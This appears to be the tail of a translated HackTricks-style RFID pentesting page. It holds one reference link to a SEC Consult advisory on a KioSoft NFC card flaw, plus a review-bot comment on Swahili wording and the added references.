- [NFC card vulnerability exploitation in KioSoft Stored Value (SEC Consult)](https://sec-consult.com/vulnerability-lab/advisory/nfc-card-vulnerability-exploitation-leading-to-free-top-up-kiosoft-payment-solution/)
{{#include ../../banners/hacktricks-training.md}}
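Review bot: the replaced body line now says "amri ghafi" for raw commands while the unchanged heading above it still reads "### Amri Mbichi"; use one Swahili term for "raw" in both. The "### Scripts" to "### Skripti" change and the retranslated scripts paragraph read fine. The added References list is appropriate: the two Proxmark3 wiki pages back the hf mf and magic-card commands used above, and the NXP and SEC Consult links match the ones added to pentesting-rfid.md.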